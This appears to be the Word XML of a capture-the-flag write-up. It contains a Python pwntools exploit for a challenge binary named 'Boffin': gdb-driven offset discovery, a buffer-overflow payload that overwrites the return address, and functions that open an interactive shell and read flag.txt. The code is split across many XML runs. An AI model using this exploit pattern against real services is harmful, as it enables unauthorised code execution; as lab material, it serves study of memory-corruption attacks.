                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>b"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>([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41) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,31)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D402C64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while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01F3F384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 xml:space="preserve">data = base + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>b"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>([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41) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,n)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06D1B3BF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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35E960FC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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="553A6FAA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recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("Hi")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DDAAC4B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recvline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0910836E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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>if(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>re.search</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">("exited normally", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cleanLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recvline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()))):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="598EBFB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>n += 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="545CD3FF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 xml:space="preserve">#data += chars[n]*8 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="083DD0A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>print(n)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="467A698A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>else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="612FA8ED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>print(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cleanLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recvline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C70651C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>#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("Segmentation fault.")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EE3DB47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>#print(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recvline</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0660399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recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("(gdb)")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="348E270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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("info registers rip")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7B2056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 xml:space="preserve">ln = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cleanLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recvline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A946E5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 xml:space="preserve">l = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>re.split</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("\s+", ln)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B58E28F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>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>l[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BF84637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>if n == 20:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EAA83A6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interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E893EB6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>else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6237A9ED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>n +=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C7ED2D3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lastRenderedPageBreak/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</w:r>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>print(n)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="786AA770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print(data)</w:t>
            </w:r>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA67C22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43F4F559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A function to build the payload to exploit </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="27753EBC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Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F47F3F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Output: String containing payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59C282A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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>buildPayload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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="161A462A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base = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>b"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>([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41) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,40)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09026D69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#print(base)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D2C18CE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data = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>b"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>([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9d), 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06), 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40), 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00), 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>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FC0717F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#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>base + data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74CF0D1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return base + </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>data</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="46364A8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2BD50936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26CF27FF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A function to build the payload to exploit </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> locally</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="743E3122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Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10EFDAD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Output: String containing payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CAB3CC0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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>buildSafePld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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3046790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base = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>b"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>([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41) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,40)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A9CDA6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#print(base)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E728BDD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r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>retAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>b"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>([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1a), 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07), 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40), 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00), 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>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B6C61D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data = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>b"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>([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9d), 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06), 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40), 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00), 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>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67F27D06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pad = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>b"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>([</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">("B", 0x00) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,3)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CB33C0D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#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>base + data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="631395A3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return base + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>retAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + pad + </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>data</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0160830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6E8F8433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 A function to send a payload to the process and open an interactive shell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12CF7E82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Input: Connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D35087C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Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36934CEC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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BFAC556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payload = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>buildPayload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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E7158A5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recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("Hey! What's your name?")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D629B12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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AE3AF06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interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BBE3679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3B3C89C3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 A function to send a payload to the remote challenge then get the flag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C7DD476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Input: Connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="224C6572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Output: Flag string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67DC913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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getFlag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13BAE94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payload = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>buildPayload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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="049438E4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recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("Hey! What's your name?")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45572C1D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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C443199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recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("Hi")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F2F84FD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recvline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D0D9F8B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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("cat flag.txt")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EAE9C33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return </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cleanLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recvline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BAAF803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48F980BA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26CC402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 A function to send a payload to the process and open an interactive shell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04C5F72E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Input: Connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39A85F7A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Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B6394E7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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getSafeShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="065423A2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lastRenderedPageBreak/>
              <w:tab/>
              <w:t xml:space="preserve">payload = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>buildSafePld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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64E7BCCA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recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("Hey! What's your name?")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29428167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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="776B151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interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62154143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647597CE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A function to attack a local instance of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> running with gdb and print the crash info</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E4DAC54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</w:t>
            </w:r>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
